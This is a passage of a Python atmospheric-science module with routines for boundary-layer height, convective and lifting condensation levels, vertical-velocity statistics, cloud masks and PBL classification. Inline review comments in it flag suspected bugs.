    # observations at index 0
    if (device == 'mod'):
        zs = height[149]
    if (device == 'obs'):
        zs = height[0]
    RiMatrix = np.zeros((nTime, nHeight))
    PBLheightArr = []
    # Richardson number matrix; zero shear yields Ri = 0 by convention
    for iT in range(nTime):
        # NOTE(review): the surface theta is read at index 149 for every
        # device — presumably model-specific; confirm for 'obs' inputs
        thetaS = thetaV[iT, 149]
        for iH in range(nHeight):
            shear = (Uwind[iT, iH]) ** 2 + (Vwind[iT, iH]) ** 2
            if shear == 0.:
                RiMatrix[iT, iH] = 0.
            else:
                RiMatrix[iT, iH] = (1 / shear) * (g / thetaS) * (thetaV[iT, iH] - thetaS) * (height[iH] - zs)
    # PBL height: last height index where Ri exceeds the threshold
    for iT in range(nTime):
        exceed = np.where(RiMatrix[iT, :] > Rithreshold)[0][:]
        if len(exceed) != 0:
            PBLheightArr.append(height[exceed[-1]] - height[nHeight - 1])
        else:
            PBLheightArr.append(0)
    return PBLheightArr
def f_calcPblHeightTW(stdWmatrix, sigmaThreshold, height2, time, device):
    """
    PBL height from a threshold on the standard deviation of vertical
    velocity, following Schween et al., 2014 (MLH at JOYCE): for model data
    ('mod'), take the maximum height below 2000 m at which sigma_w exceeds
    the threshold; nan when no level qualifies.

    created 05.12.2019, author: Claudia Acquistapace
    """
    nTime = len(time)
    mlh = np.full((nTime,), np.nan)
    for iT in range(nTime):
        # only the model branch is implemented; other devices keep nan
        if device != 'mod':
            continue
        exceeds = stdWmatrix[iT, :] > sigmaThreshold
        candidates = height2[exceeds]
        # conservative cap below 2000 m (Schween et al., 2014)
        candidates = candidates[candidates < 2000.]
        if np.count_nonzero((candidates)) != 0:
            mlh[iT] = np.nanmax(candidates)
    return (mlh)
# function to calculate the convective condensation level height and temperature
#---------------------------------------------------------------------------------
# date : 17.05.2018
# author: Claudia Acquistapace
# goal: function that calculates the convective condensation level (CCL) height and temperature.
# for the definition of the CCL check this: https://en.wikipedia.org/wiki/Convective_condensation_level
# input:
# - T field (time, height)
# - RH field (time, height) ( es: 75,0)
# - P field (time, height)
# - height [in m]
# - datetime [in datetime format]
# output:
# - Z_ccl (time) time serie of the height of the CCL
# - T_CCl (time) time serie of the temperature a parcel should have to reach the height for condensation
# - T_dew point (time, height ) dew point temperature field for every time, height
# method: the function first calculates the dew point temperature field and the dew point at the surface for every time. Then, we derive the saturation mixing ratio at the surface for T=Td. Then, we calculate the mixing ratio field
#--------------------------------------------------------------------------------
def f_CCL(T_ICON, P_ICON, RH_ICON, height_ICON, datetime_ICON, Hsurf):
    """Calculate the convective condensation level (CCL) height and temperature.

    Parameters
    ----------
    T_ICON : (time, height) temperature field [K]
    P_ICON : (time, height) pressure field [kPa]
    RH_ICON : (time, height) relative humidity field [%], e.g. 70.14
    height_ICON : height array [m]
    datetime_ICON : time array (datetime format)
    Hsurf : surface height (not used; kept for interface compatibility)

    Returns
    -------
    dict with
    - 'z_ccl' : time series of the CCL height
    - 'T_ccl' : temperature a surface parcel must have to reach the CCL
    - 'Td'    : dew point temperature field (time, height)

    Method: derive the dew point field and the surface saturation mixing
    ratio M0 (at T = Td); the CCL is where the mixing ratio profile crosses
    M0; T_ccl follows from the dry adiabatic lapse rate.
    """
    dimHeight = len(height_ICON)
    # defining constants
    cost_rvl = np.power(5423,-1.) #K
    E0 = 0.611 # Kpa
    T0 = 273. # K
    Rv = 461 # J K^-1 Kg^-1
    epsilon = 0.622
    Ad_rate = -9.8 # K/Km
    # ---- substituting RH = 0. / T = 0. with nan to avoid log(0) cases
    RH_ICON [ RH_ICON == 0.] = np.nan
    T_ICON [ T_ICON == 0.] = np.nan
    # ---- dew point temperature profile for each time (the dew point is the
    # temperature to which air must be cooled to become saturated)
    Td = np.power(np.power(T_ICON,-1.)-cost_rvl*np.log(RH_ICON/100.),-1.)
    # ---- surface values (index dimHeight-1 is the lowest level); fall back
    # to the level above when the surface value is not finite
    Td_surf = Td[:, dimHeight-1]
    P_surf = P_ICON[:,dimHeight-1]
    RH_surf = RH_ICON[:,dimHeight-1]
    for indtime in range(len(datetime_ICON)):
        if (~np.isfinite(RH_surf[indtime])):
            RH_surf[indtime] = RH_ICON[indtime,dimHeight-2]
        if (~np.isfinite(Td_surf[indtime])):
            Td_surf[indtime] = Td[indtime,dimHeight-2]
    # ---- saturation mixing ratio for Td at the surface (assuming RH = 100%)
    M0 = epsilon*E0*np.exp((1./Rv)*(T0**(-1.)-Td_surf**(-1.))) / (P_surf - E0*np.exp((1./Rv)*(T0**(-1.)-Td_surf**(-1.))))
    # ---- mixing ratio profile for each P, T, RH
    m = (RH_ICON/100.)*epsilon*E0*np.exp((1./Rv)*(T0**(-1.)-T_ICON**(-1.))) / (P_ICON - (RH_ICON/100.)*E0*np.exp((1./Rv)*(T0**(-1.)-T_ICON**(-1.))))
    # ---- find, scanning from the surface upward, the first level where m
    # drops below M0 while the level below is still above it
    ind_CCL = []
    for indTime in range(len(datetime_ICON)):
        for indHeight in range(dimHeight-2,1,-1):
            if (m[indTime,indHeight] < M0[indTime] and m[indTime,indHeight-1] > M0[indTime] ):
                ind_CCL.append(indHeight)
                break
        else:
            # BUG FIX: the original checked `if indHeight == 1` inside a loop
            # that never reaches 1 (range stops at 2), so no index was
            # appended when no crossing was found and ind_CCL could end up
            # shorter than the time array, misaligning z_ccl/T_ccl. The
            # for/else fallback restores the intended behaviour.
            ind_CCL.append(dimHeight-1)
    print(len(ind_CCL))
    z_ccl = height_ICON[ind_CCL]
    # ---- surface temperature needed to reach z_ccl along the dry adiabat
    T_ground_CCL = []
    for indTime in range(len(ind_CCL)):
        T_top = T_ICON[indTime, ind_CCL[indTime]]
        T_ground_CCL.append(T_top - Ad_rate* z_ccl[indTime]*10.**(-3))
    dict_out={'z_ccl':z_ccl,
              'T_ccl':T_ground_CCL,
              'Td':Td
              }
    return(dict_out)
def f_CCL_new(T, P, RH, height, time, date):
    """
    function to calculate convective condensation level (CCL). For more info on definitions of this level, read pp.250
    of Petty : A first course in atmospheric thermodynamics
    input: T: temperature, to be provided in K
           RH: relative humidity, in % (es: 70.14)
           P: pressure, in Kpa
           height: height array
           time: time array
           date: date label (only used by the disabled debug plotting)
    procedure:
    step 1: calculate dew point T
    step 2: calculate saturation mixing ratio m0 at t=Td, P=Psurf
    step 3: calculate, for every value of P, Td(m=m0, P)
    step 4: check, for every level of P, if there's a level i of P for which T(P)i-1 < Td(m0,P)i < T(P)i+1.
    If the level is found, assign T_star = T(P)i and Z_ccl as the height corresponding to that pressure height.
    step 5: calculate Tc using adiabatic lapse rate to come back at the height of the surface.
    output: T_ccl, z_ccl
    """
    print('calculating CCL height and T_CCL')
    # defining constants
    cost_rvl = np.power(5423, -1.) # K
    E0 = 0.611 # Kpa
    T0 = 273. # K
    Rv = 461 # J K^-1 Kg^-1
    L = 5.6 * 10 ** 6 # J/Kg
    epsilon = 0.622
    Ad_rate = -9.8 # K/Km
    # assigning dimensions:
    dimHeight = len(height)
    dimTime = len(time)
    # step 1: dew point temperature profile for each time (the dew point is
    # the temperature to which air must be cooled to become saturated).
    # substituting RH = 0. / T = 0. with nan to avoid log(0) cases
    RH[RH == 0.] = np.nan
    T[T == 0.] = np.nan
    # calculating Td
    Td = np.power(np.power(T, -1.) - cost_rvl * np.log(RH / 100.), -1.)
    # step 2: mixing ratio at the surface for T = Td and P = Psurf;
    # index of the lowest level of the height grid
    indHmin = np.nanargmin((height))
    # reading values of P, T, RH at the corresponding height
    Td_surf = Td[:, indHmin]
    P_surf = P[:, indHmin]
    RH_surf = RH[:, indHmin]
    m0 = epsilon * E0 * np.exp((1. / Rv) * (T0 ** (-1.) - Td_surf ** (-1.))) / (
            P_surf - E0 * np.exp((1. / Rv) * (T0 ** (-1.) - Td_surf ** (-1.))))
    # step 3: calculating Td(m=m0, P) for every P value
    z_ccl = np.zeros((dimTime))
    T_cclTop = np.zeros((dimTime))
    z_ccl.fill(np.nan)
    for indTime in range(dimTime):
        Tdm0_profile = np.zeros((dimHeight))
        Tdm0_profile.fill(np.nan)
        indCCLprofile = []
        # NOTE(review): Tm0_surface is recomputed from the full arrays on
        # every iteration but never used afterwards — candidate for removal;
        # confirm before deleting
        Tm0_surface = 1 / ((1 / T0) - ((1 / L) * Rv * np.log((m0 * P[:, indHmin]) / (E0 * epsilon))))
        for indHeight in range(dimHeight - 1):
            Tdm0_profile[indHeight] = 1 / (
                    (1 / T0) - ((1 / L) * Rv * np.log((m0[indTime] * P[indTime, indHeight]) / (E0 * epsilon))))
            # step 4: candidate CCL levels where T crosses the Td(m0, P) profile
            if (T[indTime, indHeight] < Tdm0_profile[indHeight]) and (
                    T[indTime, indHeight + 1] > Tdm0_profile[indHeight]):
                indCCLprofile.append(indHeight)
        if len(indCCLprofile) == 0:
            # no crossing found: CCL undefined for this time stamp
            z_ccl[indTime] = np.nan
            T_cclTop[indTime] = np.nan
        else:
            # the lowest candidate level defines the CCL height.
            # NOTE(review): np.nanargmin(height[indCCLprofile]) is an index
            # into the *subset* array, yet it is used to index the full T
            # row — looks like it should be indCCLprofile[argmin]; confirm
            z_ccl[indTime] = np.nanmin(height[indCCLprofile])
            T_cclTop[indTime] = np.nanmin(T[indTime, np.nanargmin(height[indCCLprofile])])
    print(z_ccl)
    # step 5: surface temperature needed to reach z_ccl along the dry adiabat
    T_ground_CCL = np.zeros((dimTime))
    for indTime in range(dimTime):
        T_ground_CCL[indTime] = (T_cclTop[indTime] - Ad_rate * z_ccl[indTime] * 10. ** (-3))
    # providing output as a plain dictionary (the standardized xarray output
    # was left disabled in the original)
    DatasetOut = {'time':time,
                  'height':height,
                  'z_ccl':z_ccl,
                  'T_ground_ccl':T_ground_CCL,
                  'T_top_ccl':T_cclTop,
                  'T_dew':Td}
    return (DatasetOut)
# moving variance calculation function
#---------------------------------------------------------------------------------
# date : 17.01.2018
# author: Claudia Acquistapace
# goal: function that calculates the moving variance (squared rolling standard deviation) of an array of values over a given window given as input
#--------------------------------------------------------------------------------
def runningMeanVariance(x, N):
    """Return the running (moving-window) variance of ``x`` over windows of
    length ``N``; the first N-1 entries are nan.

    ``pd.rolling_std`` was removed from pandas long ago; the
    ``Series.rolling(...).std()`` API (already used elsewhere in this
    module, see f_calcWvariance) is the supported replacement.
    """
    return np.power(pd.Series(x).rolling(N).std().to_numpy(), 2)
# variance of vertical velocity calculation
#---------------------------------------------------------------------------------
# date : 17.01.2018
# author: Claudia Acquistapace
# goal: function that calculates the variance of the vertical velocity matrix
# input:
# - matrix of vertical velocity
# - time array
# - height array
# - time window for the running mean (30 min for comparing to obs)
#--------------------------------------------------------------------------------
def f_calcWvariance(Wwind, time, height, window, res):
    """
    OBSOLETE FUNCTION NOT USED ANYMORE
    author: claudia acquistapace
    date: 05.12.2019
    goal: variance of vertical velocity, computed as the squared running
    standard deviation per height level, as in Schween et al., 2014, AMT,
    doi:10.5194/amt-7-3685-2014
    input:
    - Wwind: vertical velocity matrix (time, height)
    - time: time array
    - height: height array
    - window: time window over which to calculate the standard deviation
    - res: resolution parameter (unused here; kept for interface compatibility)
    """
    nTime = len(time)
    nHeight = len(height)
    variance = np.zeros((nTime, nHeight))
    for col in range(nHeight):
        # rolling standard deviation of w at this level, squared
        levelSeries = pd.Series(Wwind[:, col])
        variance[:, col] = np.power(levelSeries.rolling(window).std(), 2)
    return variance
# skewness of vertical velocity calculation
#---------------------------------------------------------------------------------
#--------------------------------------------------------------------------------
def f_runningMeanSkewnessVarianceStd_W(time, timeWindowSk, runningWindow, height, vertWind):
    """
    author: Claudia Acquistapace
    date created : 17.01.2018
    date modified: 05.12.2019
    goal : running-mean skewness, standard deviation and variance of the
    vertical velocity. Statistics at each output step are computed from the
    samples in the surrounding +/- runningWindow/2 window and written out at
    a resolution of timeWindowSk steps, following Schween et al., 2014, AMT,
    DOI: 10.5194/amt-703685-2014.
    input parameters:
        - time: time array
        - timeWindowSk: output resolution in samples (5 min in the paper)
        - runningWindow: window length in samples for the statistics
        - height: height array
        - vertWind: matrix of w velocity (time, height)
    output:
        - (variance, standard deviation, skewness) matrices (time, height);
          bins outside any full window stay NaN
    """
    n_t = len(time)
    n_h = len(height)
    skew = np.full((n_t, n_h), np.nan)
    std_w = np.full((n_t, n_h), np.nan)
    var_w = np.full((n_t, n_h), np.nan)
    half = runningWindow / 2
    for t0 in range(0, n_t - 1, timeWindowSk):
        # skip the first and last half-window of time stamps, which are not
        # fully surrounded by data
        if not ((t0 > half) & (t0 < n_t - 1 - half)):
            continue
        # indices of the samples contributing to this output step
        window_idx = np.arange(t0 - half, t0 + half, dtype=np.int16)
        stop = t0 + timeWindowSk - 1
        for h0 in range(n_h):
            sample = vertWind[window_idx, h0]
            w_mean = np.mean(sample)
            w_var = np.var(sample)
            anomaly = np.subtract(sample, np.tile(w_mean, len(window_idx)))
            third_moment = np.mean(np.power(anomaly, 3))
            std_w[t0:stop, h0] = np.sqrt(w_var)
            skew[t0:stop, h0] = third_moment / w_var ** (3. / 2.)
            var_w[t0:stop, h0] = w_var
    return (var_w, std_w, skew)
# cloud mask for ice/liquid/mixed phase clouds
#---------------------------------------------------------------------------------
# date : 19.01.2018
# author: Claudia Acquistapace
# goal: function that calculates cloud mask for the day
# input:
# -Qc: cloud liquid content
# -Qi: ice liquid content
# -QcThreshold: Threshold value for detection of Qc
# -QiThreshold: Threshold value for detection of Qi
# output:
# -cloudmask(dimTime,dimheight) containing: 1=liquid clouds, 2=ice clouds, 3=mixed phase clouds
#--------------------------------------------------------------------------------
def f_cloudmask(time,height,Qc,Qi,QiThreshold,QcThreshold):
    """Build a phase-resolved cloud mask from liquid and ice water content.

    input:
        - time, height: coordinate arrays (only their lengths are used)
        - Qc: cloud liquid water content matrix (time, height)
        - Qi: cloud ice content matrix (time, height)
        - QiThreshold / QcThreshold: detection thresholds for Qi / Qc
    output:
        - mask (time, height) with 0 = clear, 1 = liquid cloud,
          2 = ice cloud, 3 = mixed-phase cloud
    """
    n_t = len(time)
    n_h = len(height)
    qc = np.asarray(Qc)[:n_t, :n_h]
    qi = np.asarray(Qi)[:n_t, :n_h]
    cloudMask = np.zeros((n_t, n_h))
    # the three categories are mutually exclusive, so the assignment order
    # does not overlap; boundary values (exactly at threshold) only count
    # for the mixed-phase class, as in the original pixel-wise tests
    cloudMask[(qi > QiThreshold) & (qc < QcThreshold)] = 2.    # ice only
    cloudMask[(qi < QiThreshold) & (qc > QcThreshold)] = 1.    # liquid only
    cloudMask[(qi >= QiThreshold) & (qc >= QcThreshold)] = 3.  # mixed phase
    return cloudMask
# PBL cloud classification
#---------------------------------------------------------------------------------
# date : 25.01.2018
# author: Claudia Acquistapace
# goal: function that derives PBL classification
# input:
# -time: time array
# -height: height array
# -gradWindThr: threshold to detect wind shear regions
# -SigmaWThres: Threshold to detect turbulence
# -ylim: array of heights up to which classification is calculated
# -cloudMask: cloud mask indicating cloud presence
# -varianceMatrix: matrix containing variance of vertical velocity to detect turbulence
# -SKmatrix: matrix containing skewness of vertical velocity
# -StabilityArr: array of time dimension indicating stability of the PBL close to the surface
# -connection2Surface: array of time dimension indicating that turbulence is connected to the surface or not
# -gradWindSpeed: matrix (dimHeight,dimTime) containing the intensity of the shear of the horizontal wind
# -cloudBaseHeightArr: array of time dimension containing cloud base heights
# output:
# -PBLclass(dimTime,dimheight) containing: 1=in cloud, 2=non turb, 3=cloud driven, 4=convective, 5=intermittent, 6=wind shear
#--------------------------------------------------------------------------------
def f_PBLClass(time,height,gradWindThr,SigmaWThres,ylim, cloudMask, varianceWmatrix, SKmatrix, stabilityArr, connection2Surface, gradWindspeed, cloudBaseHeightArr):
    """Derive a pixel-by-pixel PBL classification (Manninen et al., 2018, JGR).

    Two passes over the (time, height) grid: pass 1 fills one flag matrix
    per criterion (cloud / turbulence / cloud-driven / surface instability /
    wind shear / surface-driven); pass 2 combines the flags into the class.

    input:
        - time, height: coordinate arrays
        - gradWindThr: threshold on horizontal-wind shear
        - SigmaWThres: threshold on w variance for turbulence detection
        - ylim: per-time maximum height considered for the classification
        - cloudMask: cloud mask (0 = clear, nonzero = cloudy)
        - varianceWmatrix, SKmatrix: variance / skewness of w (time, height)
        - stabilityArr: per-time surface stability (0 = unstable)
        - connection2Surface: per-time flag (0 = turbulence not connected
          to the surface)
        - gradWindspeed: horizontal wind shear matrix (time, height)
        - cloudBaseHeightArr: per-time cloud base height
    output:
        - (PBLclass, flagCloud, flagTurb, flagcloudDriven, flagInstability,
          flagWindShear, flagSurfaceDriven, flagConnection)
          PBLclass codes: 1=in cloud, 2=non turbulent, 3=cloud driven,
          4=convective, 5=intermittent, 6=wind shear.
          NOTE(review): flagConnection is returned but never written — it
          stays all-NaN (the local list flagConnect is used instead).
    """
#    time, \
#    height2, \
#    gradWindThr, \
#    SigmaWThres, \
#    ylim, \
#    cloudMask, \
#    varianceWmatrix, \
#    SKmatrix, \
#    stabilityArr, \
#    connection2Surface, \
#    shear_ICON, \
#    CB_array_ICON)
    dimTime = len(time)
    dimHeight = len(height)
    PBLclass = np.zeros((dimTime, dimHeight)) # defining output matrix
    shear = gradWindspeed#.transpose() # transposing gradWindspeed to conform to other matrices
    # defining flag matrices and filling them with nan values. Each flag corresponds to a check to be performed for the classification. Checks are for: cloud/turbulence/cloud driven/unstable at surface/wind shear/surface driven
    flagCloud = np.zeros((dimTime, dimHeight))
    flagCloud.fill(np.nan)
    flagTurb = np.zeros((dimTime, dimHeight))
    flagTurb.fill(np.nan)
    flagcloudDriven = np.zeros((dimTime, dimHeight))
    flagcloudDriven.fill(np.nan)
    flagInstability = np.zeros((dimTime, dimHeight))
    flagInstability.fill(np.nan)
    flagConnection = np.zeros((dimTime, dimHeight))
    flagConnection.fill(np.nan)
    flagSurfaceDriven = np.zeros((dimTime, dimHeight))
    flagSurfaceDriven.fill(np.nan)
    flagWindShear = np.zeros((dimTime, dimHeight))
    flagWindShear.fill(np.nan)
    # loop on time and height to assign flags to each pixel:
    for iTime in range(dimTime):
        for iHeight in range(dimHeight):
            # quitting loop on heights if height is greater than ylim.
            if height[iHeight] > ylim[iTime]:
                iHeight = dimHeight-1  # NOTE(review): reassigning the loop variable does NOT skip the remaining heights — likely intended as a 'break'
            #------------------------------------------------------------
            # check if cloud
            #------------------------------------------------------------
            if (cloudMask[iTime, iHeight] != 0):
                flagCloud[iTime, iHeight] = 1
            else:
                flagCloud[iTime, iHeight] = 0
            #------------------------------------------------------------
            # check if not in cloud and not turbulent
            #------------------------------------------------------------
            if (varianceWmatrix[iTime,iHeight] >= SigmaWThres):
                flagTurb[iTime, iHeight] = 1
            else:
                flagTurb[iTime, iHeight] = 0
            #------------------------------------------------------------
            # check if cloud driven ( conditions to pose: 1) below cloud base , 2) sigma > sthr, 3) connected to the cloud
            #------------------------------------------------------------
            if np.count_nonzero(cloudMask[iTime,:]) == 0:
                flagcloudDriven[iTime, iHeight] = 0
            else:
                indCB=f_closest(height, cloudBaseHeightArr[iTime]) # finding index of cloud base
                if iHeight <= indCB:
                    # NOTE(review): assumes height index grows with height; if the height axis is inverted (surface = last index, as in ICON output), confirm this comparison — TODO verify
                    flagcloudDriven[iTime, iHeight] = 0
                else:
                    flagConnect = []
                    # check if pixels between cloud base and height[iheight] fullfill conditions for being cloud driven
                    for ind in range(indCB, iHeight):
                        if (varianceWmatrix[iTime,ind] > SigmaWThres) & (SKmatrix[iTime,ind] < 0.):
                            flagConnect.append(1)
                    # cloud driven only when the pixel itself is turbulent with negative skewness AND every pixel down to cloud base is too
                    if (varianceWmatrix[iTime,iHeight] > SigmaWThres) & (SKmatrix[iTime,iHeight] < 0.) & (len(flagConnect) == iHeight - indCB):
                        flagcloudDriven[iTime, iHeight] = 1
                    else:
                        flagcloudDriven[iTime, iHeight] = 0
            #------------------------------------------------------------
            # check if unstable to the surface
            #------------------------------------------------------------
            if (stabilityArr[iTime] == 0):
                flagInstability[iTime, iHeight] = 1
            else:
                flagInstability[iTime, iHeight] = 0
            #------------------------------------------------------------
            # check if wind shear is present
            #------------------------------------------------------------
            if (shear[iTime,iHeight] < gradWindThr):
                flagWindShear[iTime,iHeight] = 0
            else:
                flagWindShear[iTime,iHeight] = 1
            #------------------------------------------------------------
            # check if turbulence is surface driven
            #------------------------------------------------------------
            if (connection2Surface[iTime] == 0):
                flagSurfaceDriven[iTime,iHeight] = 0
            else:
                # find min height where variance is bigger than the threshold
                indArray = np.where(varianceWmatrix[iTime,:] > SigmaWThres)[0]
                if len(indArray) > 0:
                    indHmin = np.max(indArray)  # NOTE(review): np.max picks the LARGEST index despite the comment above — confirm intent
                    if indHmin > 200:
                        flagSurfaceDriven[iTime,iHeight] = 0
                    else:
                        counter = indHmin
                        # NOTE(review): 'counter' is not used after this loop; the walk-down has no observable effect
                        while varianceWmatrix[iTime,counter] > SigmaWThres:
                            counter = counter - 1
                        flagSurfaceDriven[iTime,iHeight] = 1
                else:
                    flagSurfaceDriven[iTime,iHeight] = 0
    # defining classification by posing conditions as indicated in Manninen et al, 2018, JGR
    for iTime in range(dimTime):
        for iHeight in range(dimHeight):
            # quitting loop on heights if height is greater than ylim.
            if height[iHeight] > ylim[iTime]:
                iHeight = dimHeight-1  # NOTE(review): same no-op reassignment as above — does not skip heights
            # defining in cloud bins
            if (flagCloud[iTime, iHeight] == 1):
                PBLclass[iTime, iHeight] = 1
            # defining non turbulent bins
            if (flagCloud[iTime, iHeight] == 0) & (flagTurb[iTime, iHeight] == 0):
                PBLclass[iTime, iHeight] = 2
            # defining cloud driven bins
            if (flagCloud[iTime, iHeight] == 0) & (flagTurb[iTime, iHeight] == 1) & (flagcloudDriven[iTime, iHeight] == 1):
                PBLclass[iTime, iHeight] = 3
            # defining convective bins
            if (flagCloud[iTime, iHeight] == 0) & (flagTurb[iTime, iHeight] == 1) & (flagcloudDriven[iTime, iHeight] == 0) & (flagInstability[iTime, iHeight] == 1) & (flagSurfaceDriven[iTime, iHeight] == 1):
                PBLclass[iTime, iHeight] = 4
            # defining intermittent bins
            if (flagCloud[iTime, iHeight] == 0) & (flagTurb[iTime, iHeight] == 1) & (flagcloudDriven[iTime, iHeight] == 0) & (flagInstability[iTime, iHeight] == 1) & (flagSurfaceDriven[iTime, iHeight] == 0):
                PBLclass[iTime, iHeight] = 5
            # defining wind shear bins
            if (flagCloud[iTime, iHeight] == 0) & (flagTurb[iTime, iHeight] == 1) & (flagcloudDriven[iTime, iHeight] == 0) & (flagInstability[iTime, iHeight] == 0) & (flagWindShear[iTime, iHeight] == 1):
                PBLclass[iTime, iHeight] = 6
            # NOTE(review): this condition is a strict subset of the previous one, so it can never change the result
            if (flagCloud[iTime, iHeight] == 0) & (flagTurb[iTime, iHeight] == 1) & (flagcloudDriven[iTime, iHeight] == 0) & (flagInstability[iTime, iHeight] == 0) & (flagSurfaceDriven[iTime, iHeight] == 0) & (flagWindShear[iTime, iHeight] == 1):
                PBLclass[iTime, iHeight] = 6
            # defining intermittent bins
            if (flagCloud[iTime, iHeight] == 0) & (flagTurb[iTime, iHeight] == 1) & (flagcloudDriven[iTime, iHeight] == 0) & (flagInstability[iTime, iHeight] == 0) & (flagWindShear[iTime, iHeight] == 0):
                PBLclass[iTime, iHeight] = 5
    return (PBLclass, flagCloud, flagTurb, flagcloudDriven, flagInstability, flagWindShear, flagSurfaceDriven, flagConnection)
# list of ordered variables : var_long_name =
# "Pressure", 0
# "Temperature", 1
# "Exner pressure", 2
# "Density", 3
# "virtual potential temperature", 4
# "zonal wind", 5
# "meridional wind", 6
# "orthogonal vertical wind", 7
# "specific humidity", 8
# "specific cloud water content", 9
# "specific cloud ice content", 10
# "rain_mixing_ratio", 11
# "snow_mixing_ratio", 12
# "relative humidity", 13
# "graupel_mixing_ratio", 14
# "graupel_mixing_ratio", 15
# "number concentration ice", 16
# "number concentration snow", 17
# "number concentration rain droplet", 18
# "number concentration graupel", 19
# "number concentration hail", 20
# "number concentration cloud water", 21
# "number concentration activated ice nuclei", 22
# "total specific humidity (diagnostic)", 23
# "total specific cloud water content (diagnostic)", 24
# "total specific cloud ice content (diagnostic)", 25
# "cloud cover", 26
# "turbulent diffusion coefficients for momentum", 27
# "turbulent diffusion coefficients for heat", 28
# "Pressure on the half levels", 29
# "soil temperature", 30
# "total water content (ice + liquid water)", 31
# "ice content" ; 32
# Version 1.0 released by David Romps on September 12, 2017.
#
# When using this code, please cite:
#
# @article{16lcl,
# Title = {Exact expression for the lifting condensation level},
# Author = {David M. Romps},
# Journal = {Journal of the Atmospheric Sciences},
# Year = {2017},
# Volume = {in press},
# }
#
# This lcl function returns the height of the lifting condensation level
# (LCL) in meters. The inputs are:
# - p in Pascals
# - T in Kelvins
# - Exactly one of rh, rhl, and rhs (dimensionless, from 0 to 1):
# * The value of rh is interpreted to be the relative humidity with
# respect to liquid water if T >= 273.15 K and with respect to ice if
# T < 273.15 K.
# * The value of rhl is interpreted to be the relative humidity with
# respect to liquid water
# * The value of rhs is interpreted to be the relative humidity with
# respect to ice
# - return_ldl is an optional logical flag. If true, the lifting deposition
#   level (LDL) is returned instead of the LCL.
# - return_min_lcl_ldl is an optional logical flag. If true, the minimum of the
#   LCL and LDL is returned.
def lcl(p,T,rh=None,rhl=None,rhs=None,return_ldl=False,return_min_lcl_ldl=False):
    """Return the lifting condensation level (LCL) height in metres.

    Exact LCL expression of Romps (2017), JAS.  Inputs: p in Pa, T in K,
    and exactly one of rh / rhl / rhs as a fraction in [0, 1] — rh is with
    respect to liquid above the triple point and with respect to ice below
    it, rhl is always with respect to liquid, rhs always with respect to
    ice.  With return_ldl=True the lifting deposition level (LDL) is
    returned instead; with return_min_lcl_ldl=True the minimum of LCL and
    LDL is returned.
    """
    import math
    import scipy.special
    import numpy as numpy

    # thermodynamic constants (SI units)
    Ttrip = 273.16     # K
    ptrip = 611.65     # Pa
    E0v   = 2.3740e6   # J/kg
    E0s   = 0.3337e6   # J/kg
    ggr   = 9.81       # m/s^2
    rgasa = 287.04     # J/kg/K
    rgasv = 461        # J/kg/K
    cva   = 719        # J/kg/K
    cvv   = 1418       # J/kg/K
    cvl   = 4119       # J/kg/K
    cvs   = 1861       # J/kg/K
    cpa   = cva + rgasa
    cpv   = cvv + rgasv

    def pvstarl(temp):
        # saturation vapour pressure over liquid water
        return ptrip * (temp/Ttrip)**((cpv-cvl)/rgasv) * \
               math.exp( (E0v - (cvv-cvl)*Ttrip) / rgasv * (1/Ttrip - 1/temp) )

    def pvstars(temp):
        # saturation vapour pressure over solid ice
        return ptrip * (temp/Ttrip)**((cpv-cvs)/rgasv) * \
               math.exp( (E0v + E0s - (cvv-cvs)*Ttrip) / rgasv * (1/Ttrip - 1/temp) )

    # exactly one of the three humidity arguments must be given
    n_given = sum(arg is not None for arg in (rh, rhl, rhs))
    if n_given != 1:
        print(n_given)
        exit('Error in lcl: Exactly one of rh, rhl, and rhs must be specified')

    # derive the vapour pressure pv and the complementary humidities
    if rh is not None:
        # rh is wrt liquid above the triple point, wrt ice below it
        pv = rh * (pvstarl(T) if T > Ttrip else pvstars(T))
        rhl = pv / pvstarl(T)
        rhs = pv / pvstars(T)
    elif rhl is not None:
        pv = rhl * pvstarl(T)
        rhs = pv / pvstars(T)
        rh = rhl if T > Ttrip else rhs
    elif rhs is not None:
        pv = rhs * pvstars(T)
        rhl = pv / pvstarl(T)
        rh = rhl if T > Ttrip else rhs
    if pv > p:
        return np.nan

    # moist-air gas constants for the given vapour content
    qv = rgasa*pv / (rgasv*p + (rgasa-rgasv)*pv)
    rgasm = (1-qv)*rgasa + qv*rgasv
    cpm = (1-qv)*cpa + qv*cpv
    if rh == 0:
        return cpm*T/ggr

    # closed-form solution via the -1 branch of the Lambert W function
    aL = -(cpv-cvl)/rgasv + cpm/rgasm
    bL = -(E0v-(cvv-cvl)*Ttrip)/(rgasv*T)
    cL = pv/pvstarl(T)*math.exp(-(E0v-(cvv-cvl)*Ttrip)/(rgasv*T))
    aS = -(cpv-cvs)/rgasv + cpm/rgasm
    bS = -(E0v+E0s-(cvv-cvs)*Ttrip)/(rgasv*T)
    cS = pv/pvstars(T)*math.exp(-(E0v+E0s-(cvv-cvs)*Ttrip)/(rgasv*T))
    z_lcl = cpm*T/ggr*( 1 - bL/(aL*scipy.special.lambertw(bL/aL*cL**(1/aL),-1).real) )
    z_ldl = cpm*T/ggr*( 1 - bS/(aS*scipy.special.lambertw(bS/aS*cS**(1/aS),-1).real) )

    # select the requested output
    if return_ldl and return_min_lcl_ldl:
        exit('return_ldl and return_min_lcl_ldl cannot both be true')
    elif return_ldl:
        return z_ldl
    elif return_min_lcl_ldl:
        return min(z_lcl, z_ldl)
    else:
        return z_lcl
def f_resamplingfield(FieldStart,datetimeFieldStart,ICON_DF):
    """Resample a 1-d time series onto the time grid of ICON_DF.

    FieldStart (indexed by datetimeFieldStart) is mapped onto the time
    resolution of the externally defined dataframe ICON_DF, e.g.
    ICON_DF = pd.DataFrame(cloudMask_ICON, index=datetime_ICON, columns=height_ICON).
    data: 22 July 2019 — author: Claudia Acquistapace
    output: dataframe at the desired time resolution
    """
    import pandas as pd
    source_df = pd.DataFrame(FieldStart, index=datetimeFieldStart)
    # NOTE(review): helper name 'getIndexListsuka' looks like a typo of
    # 'getIndexList' (used by f_resampling_twoD_Field) — confirm it exists
    matched_index = getIndexListsuka(source_df, ICON_DF.index)
    placeholder = np.arange(0, len(ICON_DF.index))
    resampled_df = pd.DataFrame(placeholder, index=ICON_DF.index)
    resampled_df = getResampledDataPd(resampled_df, source_df, matched_index)
    return(resampled_df)
def f_resampling_twoD_Field(FieldStart,datetimeFieldStart,heightFieldStart, ICON_DF, ICON_DF_T):
    """Resample a 2-d (time, height) field onto the grid of ICON_DF.

    The field is first resampled along time, then the result is transposed
    and the same procedure is applied along height (using ICON_DF_T).
